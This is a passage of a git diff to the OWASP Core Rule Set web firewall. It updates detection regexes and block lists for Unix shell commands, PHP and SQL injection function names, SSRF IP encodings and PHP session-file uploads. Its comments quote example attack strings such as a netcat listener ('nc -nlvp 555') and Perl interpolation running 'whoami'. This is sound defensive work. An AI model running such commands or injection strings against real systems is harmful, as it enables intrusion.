https://coreruleset.org/docs/development/regex_assembly/. + +##! Block Unix commands being executed with no arguments +##! This rule specifically only blocks commands that can be executed +##! with no arguments to minimize the risk of false positives. + +##!+ i + +##!$ $ + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##! The `@` processor is not defined since we're matching the execution of commands with no arguments. + ##!> include-except unix-shell-noarguments unix-shell-noarguments-fps-pl1 -- ~ \S{1,10}\b +##!< diff --git a/regex-assembly/932350.ra b/regex-assembly/932350.ra new file mode 100644 index 0000000000..a3cfdbbccd --- /dev/null +++ b/regex-assembly/932350.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Block Unix commands being executed with no arguments +##! This rule specifically only blocks commands that can be executed +##! with no arguments to minimize the risk of false positives. + +##!+ i + +##!$ $ + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##! The `@` processor is not defined since we're matching the execution of commands with no arguments. + ##!> include unix-shell-noarguments -- ~ \S{1,10}\b +##!< diff --git a/regex-assembly/933160.ra b/regex-assembly/933160.ra index e63c612e4b..9c8ab4d7ab 100644 --- a/regex-assembly/933160.ra +++ b/regex-assembly/933160.ra @@ -41,6 +41,7 @@ md5 mkdir opendir passthru +phpinfo popen printf readfile @@ -53,9 +54,11 @@ usort ##! English words, or potential snippets of them, are added here to perform a regex match. ##! Compared to the parallel match performed by 933150, fewer false positives will be generated. exp +intval ord prev stat substr system unlink +unserialize diff --git a/regex-assembly/933220.ra b/regex-assembly/933220.ra new file mode 100644 index 0000000000..6f2e036c27 --- /dev/null +++ b/regex-assembly/933220.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! PHP Session File Access Detection +##! This rule detects attempts to upload or create PHP session files, which can be used for PHP session deserialization attacks. +##! Session files are stored with prefix "sess_" followed by the session ID. +##! +##! PHP session ID character sets (based on session.sid_bits_per_character): +##! 4 bits: 0-9a-f (hex, legacy) +##! 5 bits: 0-9a-v +##! 6 bits: 0-9a-zA-Z,- (after t:lowercase becomes 0-9a-z,-) +##! +##! Session ID length: 22-256 characters (session.sid_length, default 32) +##! Using 20 as minimum for some legacy/edge cases. +##! +##! References: +##! - PHP session.save_handler documentation +##! - https://www.php.net/manual/en/session.configuration.php + +##! Prefix: Match start of string OR path separator (Unix / or Windows \) +##!^ (?:^|[/\x5c]) + +##! Suffix: Match end of string +##!$ $ + +##! Main pattern: sess_ followed by valid session ID characters +sess_[0-9a-z,-]{20,256} diff --git a/regex-assembly/934120.ra b/regex-assembly/934120.ra index 581122346e..4e3de189e5 100644 --- a/regex-assembly/934120.ra +++ b/regex-assembly/934120.ra @@ -11,13 +11,19 @@ ##!> assemble ##!> include url-schemes ##!=> - :// + ##! Per https://github.com/coreruleset/coreruleset/issues/4384, + ##! some malformed urls can be normalized by parsers, creating a bypass. + ##! Changed to have optional slashes. + :/?/? ##!=> ##! http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) - ##! http://2852039166/ Dotless decimal - ##! http://7147006462/ Dotless decimal with overflow - \d{10} + ##! http://2852039166/ Dotless decimal (10 digits) + ##! http://7147006462/ Dotless decimal with overflow (10 digits) + ##! http://123456789/ Dotless decimal (9 digits) - converts to 7.91.205.21 + ##! Browsers accept any decimal that fits in 32-bit unsigned int (up to 4,294,967,295) + ##! Using 7-10 digits to catch most SSRF attempts while reducing false positives + \d{7,10} ##! http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} diff --git a/regex-assembly/934140.ra b/regex-assembly/934140.ra index 2451647b17..68a75bf426 100644 --- a/regex-assembly/934140.ra +++ b/regex-assembly/934140.ra @@ -1,15 +1,7 @@ ##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regex_assembly/. -##! The text describes a performance issue with a simple regular expression "@{.*}" used for searching. The problem arises because the ".*" part matches any character zero or more times, which can lead to inefficient searching in some engines. +##! Find Perl string interpolation that tries to execute shell commands, e.g., `"...@{[system 'whoami']}...". +##! We simply look for the sequence `@{[`, taking into account potential white space. The pattern should be specific enough to avoid most FPs, while not causing issues with backtracking. -##! We want to reduce the possibility of impacting performance by removing the strings we can match before the one we are looking, "@{" -##! This regex avoids the double backtracking problem and ensures it finds the first "@{" efficiently. - -##! The prefix here to prevent backtracking is: -##! - something that is not an '@' -##! - or something that is an '@', but is not followed by '{' - -##!^ ^(?:[^@]|@[^{])* - -@+{[^}]*} +@+\{\s*\[ diff --git a/regex-assembly/942350.ra b/regex-assembly/942350.ra index 170fbd397e..cdb14b8c29 100644 --- a/regex-assembly/942350.ra +++ b/regex-assembly/942350.ra @@ -19,6 +19,7 @@ create\s+function\s.+\sreturns insert load rename + replace select truncate update diff --git a/regex-assembly/942410.ra b/regex-assembly/942410.ra index 751d6252f6..fad39837b5 100644 --- a/regex-assembly/942410.ra +++ b/regex-assembly/942410.ra @@ -1,246 +1,77 @@ ##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regex_assembly/. +##! This dataset in an extended version of regex-assembly/include/sql-injection-function-names.ra +##! It contains sequences with a high risk of false positives including regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra + ##!+ i ##!^ \b ##!$ \W*?\( abs acos -adddate -addtime -aes_decrypt -aes_encrypt -asin -ascii -asciistr -atan -atan2 avg -benchmark bin -bin_to_num -bit_and -bit_count -bit_length -bit_or -bit_xor cast char -character_length -char_length charset chr -ciel -cieling -coalesce -coercibility -compress -concat -concat_ws -connection_id -conv convert -convert_tz -cos -cot count -cr32 -curdate -current_date -current_time -current_timestamp -current_user -curtime -database date -date_add -datediff -date_format -date_sub day -dayname -dayofmonth -dayofweek -dayofyear -dcount -decode default degrees -des_decrypt -des_encrypt -dump elt -encode -encrypt -exp -export_set -extract -extractvalue field -field_in_set -find_in_set floor format -found_rows -from_base64 -from_days -from_unixtime -get_format -get_lock -greatest -group_concat -hex -hextoraw hour if -ifnull in -inet6_aton -inet6_ntoa -inet_aton -inet_ntoa -insert -instr -interval is -is_free_lock -is_ipv4 -is_ipv4_compat -is_ipv4_mapped -is_ipv6 -is_not -is_not_null -isnull -is_null -is_used_lock last -last_day -last_insert_id -lcase -least left length ln -load_file +likelihood local -localtimestamp -locate log -log10 -log2 lower -lpad -ltrim -makedate -make_set -master_pos_wait max -md5 -microsecond -mid min minute mod month -monthname -name_const -not_in now -nullif -oct -octet_length -old_password -ord password -period_add -period_diff -pg_sleep pi position -pow power -procedure_analyse quarter -quote -radians -rand -rawtohex rawtonhex rawtonhextoraw -release_lock repeat replace reverse right round -row_count -rpad -rtrim -schema second -sec_to_time -session_user -sha -sha1 -sha2 sign -sin sleep -soundex space -sqrt -std stddev -stddev_pop -stddev_samp -strcmp -str_to_date -subdate -substr -substring -substring_index -subtime sum -sysdate -system_user tan time -timediff -time_format -timestamp -timestampadd -timestampdiff -time_to_sec -to_base64 to_char to_days to_nchar to_seconds -trim -truncate -ucase -uncompress -uncompressed_length -unhex -unix_timestamp -updatexml +unlikely upper user -utc_date -utc_time -utc_timestamp -uuid -uuid_short values -variance -var_pop -var_samp version week -weekday -weekofyear -weight_string -xmltype year -yearweek diff --git a/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra b/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra index f5a352ea7f..5b3771d2d5 100644 --- a/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra +++ b/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra @@ -4,6 +4,8 @@ ##! This list excludes command words that are prone to cause false positives ##! at paranoia level 1. +##! Additions to this list should also result in an addition to this one: regex-assembly/942410.ra + convert degrees elt diff --git a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra index 1494dc2860..0832b7c8a7 100644 --- a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra +++ b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra @@ -16,9 +16,6 @@ date date@ date~ -group -group@ -group~ more more@ more~ diff --git a/regex-assembly/exclude/unix-shell-fps-pl1.ra b/regex-assembly/exclude/unix-shell-fps-pl1.ra index 1f7e6e0f16..a5521d87d2 100644 --- a/regex-assembly/exclude/unix-shell-fps-pl1.ra +++ b/regex-assembly/exclude/unix-shell-fps-pl1.ra @@ -64,10 +64,6 @@ ##! EOF ##! echo "${result}" | sort | uniq >> regex-assembly/exclude/unix-shell-fps-pl1.ra -##! Note: As part of the effort to reduce FPs mid-term (https://github.com/coreruleset/coreruleset/pull/3735) -##! we've decided to exclude some commands for which only the exact match is an issue -##! (mostly for 933236). - GET GET@ GET~ @@ -352,9 +348,6 @@ go go@ go~ grc -group -group@ -group~ gtester hash hash@ @@ -521,9 +514,6 @@ npm@ nroff nsenter nslookup -null -null@ -null~ octave octave@ octave~ @@ -558,9 +548,6 @@ perms@ perms~ pf pf@ -pg -pg@ -pg~ php php@ php~ @@ -594,10 +581,6 @@ puppet puppet@ puppet~ pushd -##! excluded as part of PR #3735 -pwd -pwd@ -pwd~ python python@ python~ @@ -669,12 +652,6 @@ set~ sg sg@ sg~ -shadow -shadow@ -shadow~ -shells -shells@ -shells~ shuf shutdown shutdown@ @@ -727,10 +704,7 @@ taskset task~ tbl tclsh -tcp -tcp@ tcpdump -tcp~ tee tee@ tee~ @@ -745,10 +719,6 @@ time time@ time~ timedatectl -##! excluded as part of PR #3735 -timeout -timeout@ -timeout~ tmux top top@ @@ -761,10 +731,6 @@ tshark ul ul@ ulimit@ -##! excluded as part of PR #3735 -uname -uname@ -uname~ uncompress uncompress@ uncompress~ @@ -813,9 +779,6 @@ whiptail@ whiptail~ who who@ -whois -whois@ -whois~ who~ wireshark wish @@ -840,9 +803,6 @@ yes@ yes~ yum zathura -zero -zero@ -zero~ zip zip@ zip~ diff --git a/regex-assembly/exclude/unix-shell-fps-pl2.ra b/regex-assembly/exclude/unix-shell-fps-pl2.ra index fb1dde3d73..d55b11dd7e 100644 --- a/regex-assembly/exclude/unix-shell-fps-pl2.ra +++ b/regex-assembly/exclude/unix-shell-fps-pl2.ra @@ -11,152 +11,33 @@ ##! `awk@` to `awk~`, this list would not have to be updated. ##! See also unix-shell-fps-pl1.ra. -##! Note: As part of the effort to reduce FPs mid-term (https://github.com/coreruleset/coreruleset/pull/3735) -##! we've decided to exclude some commands for which only the exact match is an issure -##! (mostly for 933236). - aptitude aptitude@ aptitude~ -##! excluded as part of PR #3735 -cron -cron@ -cron~ -date -date@ -date~ -##! excluded as part of PR #3735 -dir -dir@ -dir~ dnf dnf@ dnf~ -##! excluded as part of PR #3735 -ed -ed@ -ed~ -##! excluded as part of PR #3735 -file -file@ -file~ -##! excluded as part of PR #3735 -GET -GET@ -GET~ -##! excluded as part of PR #3735 -hash -hash@ -hash~ -##! excluded as part of PR #3735 -HEAD -HEAD@ -HEAD~ -##! excluded as part of PR #3735 -id -id@ -id~ -##! excluded as part of PR #3735 -install -install@ -install~ -##! excluded as part of PR #3735 -java -java@ -java~ -##! excluded as part of PR #3735 -mail -mail@ -mail~ more more@ more~ -##! excluded as part of PR #3735 -null -null@ -null~ pacman pacman@ pacman~ ps ps@ ps~ -##! excluded as part of PR #3735 -pg -pg@ -pg~ -##! excluded as part of PR #3735 -php -php@ -php~ -##! excluded as part of PR #3735 -POST -POST@ -POST~ -##! excluded as part of PR #3735 -rename -rename@ -rename~ -##! excluded as part of PR #3735 -repeat -repeat@ -repeat~ -##! excluded as part of PR #3735 -screen -screen@ -screen~ -##! excluded as part of PR #3735 -sort -sort@ -sort~ -##! excluded as part of PR #3735 -ss -ss@ -ss~ -##! excluded as part of PR #3735 -source -source@ -source~ -##! excluded as part of PR #3735 -task -task@ -task~ time time@ time~ -##! excluded as part of PR #3735 -timeout -timeout@ -timeout~ -##! excluded as part of PR #3735 -uname -uname@ -uname~ up2date up2date@ up2date~ vi vi@ vi~ -##! excluded as part of PR #3735 -wall -wall@ -wall~ -##! excluded as part of PR #3735 -view -view@ -view~ who who@ who~ -##! excluded as part of PR #3735 -whois -whois@ -whois~ w w@ w~ -##! excluded as part of PR #3735 -yes -yes@ -yes~ diff --git a/regex-assembly/exclude/unix-shell-fps-useragents.ra b/regex-assembly/exclude/unix-shell-fps-useragents.ra index 9cbd3f5541..0855584fb8 100644 --- a/regex-assembly/exclude/unix-shell-fps-useragents.ra +++ b/regex-assembly/exclude/unix-shell-fps-useragents.ra @@ -16,10 +16,6 @@ ##! `curl@` to `curl~`, this list would not have to be updated. ##! See also unix-shell-fps-pl1.ra. -# CPanel client (https://cpanel.net): Cpanel-HTTP-Client/1.0 -cpan -cpan@ -cpan~ # curl (https://curl.se): curl/8.1.2 curl curl@ diff --git a/regex-assembly/exclude/unix-shell-noarguments-fps-pl1.ra b/regex-assembly/exclude/unix-shell-noarguments-fps-pl1.ra new file mode 100644 index 0000000000..a3cbc6807f --- /dev/null +++ b/regex-assembly/exclude/unix-shell-noarguments-fps-pl1.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes the execution of command with no arguments at PL-1 +##! that are prone to false positives. + +dir +history +id +pwd +screen +top +uname diff --git a/regex-assembly/include/unix-shell-4andup.ra b/regex-assembly/include/unix-shell-4andup.ra index b7c67413b3..ab77df1308 100644 --- a/regex-assembly/include/unix-shell-4andup.ra +++ b/regex-assembly/include/unix-shell-4andup.ra @@ -8,10 +8,10 @@ ##! To regenerate this list from unix-shell.data, run the following: ##! NL=$'\n' ##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" -##! source="$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' \ -##! rules/unix-{shell,shell-builtins}.data | \ +##! # Exclude entries starting with `(dev/|etc/|proc/|#)` and empty lines, they are not commands +##! source="$(grep -vEh '^(dev/|etc/|proc/|#|$)' rules/unix-{shell,shell-builtins}.data | \ +##! awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' | \ ##! sort | uniq)" -##! result="" ##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes ##! while read -r oword; do ##! # strip suffixes from end of words @@ -52,9 +52,10 @@ ##! # Suffix all English words or words shorter than 5 characters with `@` ##! original="${result}" +##! tmpfile="$(mktemp)" ##! wget https://raw.githubusercontent.com/coreruleset/coreruleset/refs/tags/v4.0.0/util/fp-finder/english-extended.txt -##! english="$(crs-toolchain util fp-finder -e english-extended.txt - <<<"${result}")" -##! rm -f english-extended.txt +##! english="$(crs-toolchain util fp-finder "$tmpfile" -e english-extended.txt <<<"${result}")" +##! rm -f "$tmpfile" english-extended.txt ##! result="" ##! while read -r oword; do ##! found=0 @@ -253,7 +254,6 @@ gimp@ ginsh@ grcat@ grep@ -group@ groupmod gtester gunzip @@ -346,7 +346,6 @@ mail@ mailq@ mailx@ make@ -master\.passwd mawk@ mkdir@ mkfifo @@ -389,7 +388,6 @@ nroff@ nsenter nslookup nstat@ -null@ octave@ onintr openssl @@ -437,7 +435,6 @@ ptardiff ptargrep puppet@ pushd@ -pwd\.db py3versions python2 python3 @@ -487,8 +484,6 @@ setfacl@ setsid sftp@ sh\.distrib -shadow@ -shells@ shuf@ shutdown@ sleep@ @@ -500,7 +495,6 @@ soelim sort@ source@ split@ -spwd\.db sqlite3 ssh-add ssh-agent @@ -510,9 +504,6 @@ ssh-keyscan sshpass start-stop-daemon stdbuf -stderr -stdin@ -stdout strace strings@ sudo-rs @@ -552,6 +543,7 @@ tmux@ touch@ traceroute traceroute6 +trap@ troff@ tshark ulimit@ @@ -616,7 +608,6 @@ zcat@ zcmp@ zdiff@ zegrep -zero@ zfgrep zgrep@ zipcloak diff --git a/regex-assembly/include/unix-shell-noarguments.ra b/regex-assembly/include/unix-shell-noarguments.ra new file mode 100644 index 0000000000..0bb21c8672 --- /dev/null +++ b/regex-assembly/include/unix-shell-noarguments.ra @@ -0,0 +1,34 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list contains a curated set of commands that can be meaningfully executed with no arguments. + +aptitude +df +dir +dmesg +env +history +hostname +htop +id +iostat +last +ls +mysql +mysql~ +ps +psql +pwd +reboot +screen +set +shutdown +su +top +uname +vmstat +w +who +whoami +whois diff --git a/regex-assembly/include/unix-shell-upto3.ra b/regex-assembly/include/unix-shell-upto3.ra index 3343c82b84..8a04b4032e 100644 --- a/regex-assembly/include/unix-shell-upto3.ra +++ b/regex-assembly/include/unix-shell-upto3.ra @@ -6,8 +6,9 @@ ##! NL=$'\n' ##! # select words of length <= 3 ##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" -##! source=$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' \ -##! rules/unix-{shell,shell-builtins}.data | \ +##! # Exclude entries starting with `(dev/|etc/|proc/|#)` and empty lines, they are not commands +##! source=$(grep -vEh '^(dev/|etc/|proc/|#|$)' rules/unix-{shell,shell-builtins}.data | \ +##! awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' | \ ##! sort | uniq) ##! result="" ##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes @@ -102,7 +103,6 @@ es@ esh@ ex@ fc@ -fd@ fg@ fi@ fmt@ @@ -146,8 +146,8 @@ pf@ pg@ php@ pic@ -pip~ pip@ +pip~ pkg@ pr@ pry@ @@ -175,12 +175,10 @@ svn@ tac@ tar@ tbl@ -tcp@ tee@ tex@ tic@ top@ -udp@ ul@ vi@ vim@ diff --git a/regex-assembly/toolchain.yaml b/regex-assembly/toolchain.yaml index 70dc47bd05..c3129af2fe 100644 --- a/regex-assembly/toolchain.yaml +++ b/regex-assembly/toolchain.yaml @@ -20,7 +20,7 @@ patterns: # - &|: logical operators in headers, e.g., `a=nc&&$a -nlvp 555` # - ): subshell, e.g, `(ifconfig)` unix: | - (?:[\s<>&|),]|$).* + [\s<>&|),].* # "more foo", "more,foo", "more;foo", "more.com", "more/e", # "morefoo" windows: | @@ -41,11 +41,11 @@ patterns: # It will _not_ match: # python foo # - # (?:[<>&|),]|$){1,10}: anti-evasion suffix without space, limited to 10 matches + # [<>&|),]{1,10}: anti-evasion suffix without space, limited to 10 matches # (?:[\w\d._-][\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c?){1,10}: non-whitespace followed by anti-evasion pattern, limited to 10 matches - # (?:[\s<>&|),}]|$){1,10}): anti-evasion suffix, including `}` (to match command names within expansions, e.g. `${gcc7.4}gcc7.4`), limited to 10 matches + # [\s<>&|),}]{1,10}): anti-evasion suffix, including `}` (to match command names within expansions, e.g. `${gcc7.4}gcc7.4`), limited to 10 matches unix: | - (?:(?:[<>&|),]|$){1,10}|(?:[\w\d._-][\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c?){1,10}(?:[\s<>&|),}]|$){1,10}) + (?:[<>&|),]{1,10}|(?:[\w\d._-][\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c?){1,10}[\s<>&|),}]{1,10}) # This will match: # # python,foo diff --git a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example index ceadfa223f..c474aa79d1 100644 --- a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example +++ b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # diff --git a/rules/REQUEST-901-INITIALIZATION.conf b/rules/REQUEST-901-INITIALIZATION.conf index 4b0e2ebb9b..d65e423edd 100644 --- a/rules/REQUEST-901-INITIALIZATION.conf +++ b/rules/REQUEST-901-INITIALIZATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -26,7 +26,7 @@ # # Ref: https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#seccomponentsignature # -SecComponentSignature "OWASP_CRS/4.22.0" +SecComponentSignature "OWASP_CRS/4.23.0" # # -=[ Default setup values ]=- @@ -60,7 +60,7 @@ SecRule &TX:crs_setup_version "@eq 0" \ auditlog,\ msg:'CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL'" @@ -79,7 +79,7 @@ SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.inbound_anomaly_score_threshold=5'" # Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf) @@ -89,7 +89,7 @@ SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.outbound_anomaly_score_threshold=4'" # Default Reporting Level (rule 900115 in crs-setup.conf) @@ -99,7 +99,7 @@ SecRule &TX:reporting_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.reporting_level=4'" # Default Early Blocking (rule 900120 in crs-setup.conf) @@ -109,7 +109,7 @@ SecRule &TX:early_blocking "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.early_blocking=0'" # Default Blocking Paranoia Level (rule 900000 in crs-setup.conf) @@ -119,7 +119,7 @@ SecRule &TX:blocking_paranoia_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_paranoia_level=1'" # Default Detection Paranoia Level (rule 900001 in crs-setup.conf) @@ -129,7 +129,7 @@ SecRule &TX:detection_paranoia_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" # Default Sampling Percentage (rule 900400 in crs-setup.conf) @@ -139,7 +139,7 @@ SecRule &TX:sampling_percentage "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.sampling_percentage=100'" # Default Anomaly Scores (rule 900100 in crs-setup.conf) @@ -149,7 +149,7 @@ SecRule &TX:critical_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.critical_anomaly_score=5'" SecRule &TX:error_anomaly_score "@eq 0" \ @@ -158,7 +158,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.error_anomaly_score=4'" SecRule &TX:warning_anomaly_score "@eq 0" \ @@ -167,7 +167,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.warning_anomaly_score=3'" SecRule &TX:notice_anomaly_score "@eq 0" \ @@ -176,7 +176,7 @@ SecRule &TX:notice_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.notice_anomaly_score=2'" # Default HTTP policy: allowed_methods (rule 900200 in crs-setup.conf) @@ -186,7 +186,7 @@ SecRule &TX:allowed_methods "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Default HTTP policy: allowed_request_content_type (rule 900220 in crs-setup.conf) @@ -196,8 +196,8 @@ SecRule &TX:allowed_request_content_type "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ - setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/reports+json| |application/csp-report|'" + ver:'OWASP_CRS/4.23.0',\ + setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json|'" # Default HTTP policy: allowed_request_content_type_charset (rule 900280 in crs-setup.conf) SecRule &TX:allowed_request_content_type_charset "@eq 0" \ @@ -206,7 +206,7 @@ SecRule &TX:allowed_request_content_type_charset "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" # Default HTTP policy: allowed_http_versions (rule 900230 in crs-setup.conf) @@ -216,7 +216,7 @@ SecRule &TX:allowed_http_versions "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" # Default HTTP policy: restricted_extensions (rule 900240 in crs-setup.conf) @@ -226,8 +226,8 @@ SecRule &TX:restricted_extensions "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ - setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swp/ .sys/ .temp/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" + ver:'OWASP_CRS/4.23.0',\ + setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" # Default HTTP policy: restricted_headers_basic (rule 900250 in crs-setup.conf) SecRule &TX:restricted_headers_basic "@eq 0" \ @@ -236,7 +236,7 @@ SecRule &TX:restricted_headers_basic "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ /x-middleware-subrequest/ /expect/'" # Default HTTP policy: restricted_headers_extended (rule 900255 in crs-setup.conf) @@ -246,9 +246,28 @@ SecRule &TX:restricted_headers_extended "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - 